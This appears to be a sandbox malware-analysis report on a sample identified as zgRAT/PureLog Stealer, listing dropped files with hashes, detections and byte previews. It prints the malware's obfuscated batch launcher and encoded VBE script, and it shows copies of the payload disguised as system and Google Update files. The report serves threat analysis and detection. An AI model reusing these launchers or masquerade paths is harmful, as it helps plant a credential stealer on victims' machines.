                                                                                                                  SHA1:7739F32269FA6F6374C442F1A181B6F6F909E1B6
                                                                                                                  SHA-256:6AF5D7A337E9BDB06C17EEC0E69BA222F92F8C85D0BC6B4B86A68408AA74D887
                                                                                                                  SHA-512:B45F7D134214413DC58109348BCE7FDFE7DEBB430B514DF66E4FB515E857E519E5661A57EFBD2DCA23F9BDB5720A80FDD6E5B6DD48793A57254AE2C9137CD15E
                                                                                                                  Malicious:false
                                                                                                                  Preview:rk07HEtA7hLe48MUYRIZisaW1FBf96OoPAI0OceA6XfhfKHuqJUKHO88KdFBDNBASgP40VF6xHcKN21q8QyzlDhBBJpuWc7sWeO85N4VEYX9wyvSmYDwZLZO9O3qpUjUKtxso2vvWdvNqhOMYXH7YKTLF98rTNptzCzCADntnSa6aLic9qSRMl69ammo4EbIxBXosMMVuYUGtWu3bgrn4XhNGzlXa8zi0RIZy3twd7hyRzPD1sNXWxOaeKi2ly4viwQcOVFiw4J7zs6RjhfrvcLCDr4nU1LpDwQeixzgnokcoRkwORTDSM9FkNYgacN5te3Dbbsvs9EG1tYwHIZDiIW0xK4VZTFKbpsJXhUwjhVTH2O0zmZRDJXlIDQQgXWY34pMAPZjymeAwDs46Egx3yHRRHBTRDQLK6ZNNBzjMzdapWyEUVUc1jfFwX43NFSvWS00oeq4O6kEUqm5T685txUlbTb0H6WHhsEXg7a0pZO58auGu9jQGWBi7OZUD0xRjchmlPZWgIQTiZmAiUFHXFBKqfZRiFw

                                                                                                                  C:\Drivers\SE7AQJDJtAMXQraxpdEvOEZ68dJxrB3UY7MvAzdsW8.bat

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):96
                                                                                                                  Entropy (8bit):5.062950688862252
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:wBRC2Z7a71T2ExiST6XILRFWCNRcmA:wPIB2NST8IlFBumA
                                                                                                                  MD5:4CA51D230B98301363F779FBD2FD796C
                                                                                                                  SHA1:CF13C37E94C171FD4853A60F7509A61FFF48BEA4
                                                                                                                  SHA-256:95F47FE6CE9F000C06F234C0B523E7726C02214C008BAFE9B53A3DD3FAB9C1DE
                                                                                                                  SHA-512:88C214A6D3E822138C3CD611CB8E09F15B4F17BADBEC1773C743F8D9AAF81F5B1A59229C2FFB6725978A01A4A1227DBE0BB29A8D8D75939096116D340A73712D
                                                                                                                  Malicious:false
                                                                                                                  Preview:%pdlzgHLbolS%%OXkQthmtDlsaCb%..%VTkRatou%"%SystemDrive%\/Drivers/fontdrvhost.exe"%vkfbTXKadaRJC%

                                                                                                                  C:\Drivers\fontdrvhost.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r

                                                                                                                  C:\Drivers\tovs28pB6Vd1SzaEcRy6OtKi8G4GdEOG4Cet.vbe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):239
                                                                                                                  Entropy (8bit):6.002556688611792
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Gbt2wqK+NkLzWbHY08nZNDd3RL1wQJR62Eg+0BhPBWQRJ:GxMCzWLY04d3XBJDD+0BhPx
                                                                                                                  MD5:4890F14477D1A84A5BEB720942CE8DB4
                                                                                                                  SHA1:5110473AF3AD8D1CFB5E108D45A6B1B3156D3CAC
                                                                                                                  SHA-256:35714B614BA40D6C70441D10D07EC7B33F2F9D72737D1E35A104070F56B07800
                                                                                                                  SHA-512:19A185B77CAB6B4F64F145C4EDC995D0DF82ED4CDB823E919BC6ABB6F6C4420754F1596880FF72FBED26027AC938E7A555A5524802DFCCFED5ED09ACE73E2DC6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:#@~^1gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&zGDr\.Dd&J?2F)pxf9D)\(5Dm62N3-}2tvR[9XD$f`5G\-zy[/q0c4CDJBP!BP6CVk+EkQAAA==^#~@.

                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r

                                                                                                                  C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\fdadf3e88d0159

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (362), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):362
                                                                                                                  Entropy (8bit):5.8227394254856595
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:4yPPMhzUss5EeNsg7R4jckAqrVtBbQofITgloS5Lm+YpfHKPyobIVWs+/C1XM8cG:4UM9ulLKjVAqr5TQTgy8a+Y1wyaSp+gV
                                                                                                                  MD5:18B6CB1603FA90E99F1AF3BA44C8CBFF
                                                                                                                  SHA1:C32F5CAC2F916156D9C94B9772CE7EB757834974
                                                                                                                  SHA-256:2461B54CF25491CB468478AAF0DB81A212661443090F164D662D489EEE5F67C5
                                                                                                                  SHA-512:71ADA51D3E822E0E7FB5F37631AD0D41A683C4888908594A985DFF023DF10E366796A09366B07945CAC906F5AA706E60C229FE84C5AAE966728BCAEFB34ACD7E
                                                                                                                  Malicious:false
                                                                                                                  Preview:brmEGHa0jhJVDD7f1pJSDE5B1EgLYqcZTlpAXdeRW2KIvIYT8k7boISXwkMCkPb3FtCbY7IXL16L3xQtpMMysBvLTRNxQcqHaRDBG75BbkQwLHe9TdWXCnLD80HGtVGsKzultPnsRLWIu9AMxOdxFTEwF9DPzzRGdhlVW2PE0oG1QDT905Sf1Tn1v8gtMX2c3QoMXo058Z6aMMfCqDY3gwOJ4tkXWf1cvo8AYGlMFXgcWMoiceDI996HBfSnDcjchepiOfnjcMyIPwwrEB51ctdwr193x8ImyD42gGU60dqxKx1OskiCgrAyA20XguwdDMTM14K8r8A8Cqm4AuKNZGGHCG1oP7aGrMt8eoWyZk

                                                                                                                  C:\Program Files\Internet Explorer\en-US\088424020bedd6

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (904), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):904
                                                                                                                  Entropy (8bit):5.903570142849392
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:h/HrVAPkCsailqTG/CxS3nnUyN/9vq0WYDouM0anNTGynS:h/HrckC1GqaCxS3nnUyN/BJWYZM0YjS
                                                                                                                  MD5:AE30803BC3DA822182C551A7C2F840C7
                                                                                                                  SHA1:AEAD6A637D2B556C9351D3CE80D88C12E25DB47B
                                                                                                                  SHA-256:F7DC8448AFBA98DE178C6E364D8EEA493BDA6185AD0B9B2A315A4DE60E50FD91
                                                                                                                  SHA-512:258D2D908C2D0DFA4876B817B53EA08813A668D12F07CCC4C2961F53B2C36B190CE83176AEF2B4D512A67BA2A4971370B97361D70AB865D47159CE8EA0E1C40F
                                                                                                                  Malicious:false
                                                                                                                  Preview:8QVoDgGCqiTiJxAfMtHEc6D5q1AtNTEGmdxaOAz8QxbB2BeoVxhbRubBNZ8LgWyWeM5pAjRL4IxofCCoWVYZwmz2BvMzCnc48EgpGyovgWgI6wfLWTyK8Zk2XCoOWbIRq2qbfWiirn2aFq5OQBctyR6jdoSDKZYFNPbDGEp9vQdVgKwrHZ8V8YdZ6G71EfXROxM0O1ILVd8hxlDT2k5vbDGyvCH9Gy4P2LGs75cPRw9fa5mVDn8djm0KrXFMuIEhisoleVV6IpeoEkYzav6czbqQV6Aj0QfIrb7rRA1sRCV3ILFG9Pw8MmrHCXQiUwG1KV6mnqia4NLxFwIJ03kkeg6Ft0p3tTYf5etwOcdTrVE8a4CPPGraMfXnZ13xAoqkzp1kDW4XaQ2Ic7ozyZoml8TZHFWXjqSDpdJvDbM2LU95nOLbME8lAD91Vbd89hxt7zc8y3vXMvaQ8Xw234LfrrCmeRZm7O3ogQ7xvNnTSlYPms37olEEWSCQx0egdJa81wusZ9GqR1MFSw9vYc7VKySONrA4tG0JLaX08LhpfYxeF67A1sIALEyDdges8L6LBD42ZIxN4SzvByIRuADA7z7GlUXcqzqTblcCBEks55G3OCCoXM78I6NMFxQFvUgElgTZWGPqZUECsE1jRsFe1rLeYQ6Oxf7kYBRssmSQ6Rjx2LdA5rxDPCN4UzBFKB23XdoqxJ0oZyhkIYmNw5SFs4VVyXY3lMF4ZqZZgxNw1Inbenv5MxTOtwKdIS2au6DNsnKc8Nq9rgNkQ41Llcrx20Lmf6RO4xB5Fas1cT79HUhNikMObqySPPU1bi6B6bE4eSf0L9tRfrqiT8D4uCxO8tq0G0Z3W5DpQmsQFVCb7gwhividfBR3oz5umouVjz5knARrPxzY

                                                                                                                  C:\Program Files\Internet Explorer\en-US\conhost.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\en-US\conhost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-US\conhost.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: Etqq32Yuw4.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r

                                                                                                                  C:\Users\Default\AppData\Local\Microsoft\Windows\History\AdbXCBUViTnoVBSsOq.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r

                                                                                                                  C:\Users\Default\AppData\Local\Microsoft\Windows\History\fdadf3e88d0159

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (658), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):658
                                                                                                                  Entropy (8bit):5.893783528304391
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:KV+FENI5C9ridsOaeT/gzkQPY+lBTxbM/MdsJUVKncJPJbFtgIV:Fm6CB8LEPYkM/OsS7JbFtgIV
                                                                                                                  MD5:3ACB65A795D47292CBB60972112CACE3
                                                                                                                  SHA1:BF40EBA64213681296B3DBDF0C62B9C7AC2C28B4
                                                                                                                  SHA-256:FE4F9D5403C3275367286638E5FF5F4A648F1A5888A1780A0D6FDDC4D6F00986
                                                                                                                  SHA-512:48C79260112947F0EBE67E7D3E9D5EA24A8613A6C6B7ED52590559F785830FAE07C9C1470DE11F0286C5C0DE57A3E169508120BD703F61638445E636CB990DF3
                                                                                                                  Malicious:false
                                                                                                                  Preview:0G0s4uTfW8KglOB7KK3POOthoVJfIo2R7P1KNd34yJEaPvgOw4QNY9ZlXTDjkyXsF3jVX0trR9bEKTR3y5tNXo28zQx4aUTAwVUWML06Kj6ZhUaDBKupEJUaBlfGDzQ7pbSz85qnEwCyscaf0t2Qjo5nB4Vkpt2VS9uGClFGdHlSHfsiLAQT6AXBfoxEkF7U4rfssTcOowwcCnffLwZpdiYRmskXxAgXJQXa99z1hBpJO582JS2xpS1VSOG9sEbnQYSwPFfM7iHb2PDqurOfIsr0ZCHv2zIdkC3zmMnDwqzHLacDKaPBz6fhrcWM7tTHZo00VOEhELsb3jo8kElckHnnhVIKzbFDXrshjmr6Vr6oODoHxYm2I0hSBNSAF4snGpEL1HZ8XoH2K8ZerBWbzM4gJZgWTr0b9Tij8dPp8nfdtpHCxySEhQx3uhBblDppyp20a0fOvqcLqaxeSdieYv3tfpybbxE58zpDxQm7TET0xmMTuhJHeKRCvJVvBEw8mhM1vtqB1lLUcC53cfq4n6byimSo515PRUOQZViB0HQ296ksNbSgX2UpFYSIaCGAq5CHypdH7oDgqjzlCjadiY1ZAiKBCZlxBPLD4c4i8Ljtyy8gjrF1mmbREnHPebEhDPfaXvrjp2fXzHkLjn

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AdbXCBUViTnoVBSsOq.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2041
                                                                                                                  Entropy (8bit):5.374034001672589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
                                                                                                                  MD5:6594A52AA7EC9BF342D53EF8C5C3F92F
                                                                                                                  SHA1:E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
                                                                                                                  SHA-256:1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
                                                                                                                  SHA-512:29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey

                                                                                                                  C:\Users\user\AppData\Local\Temp\4lvmN5MENl

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5242880
                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\A2vEYebXmT

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):155648
                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\A67NMeIxhy

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
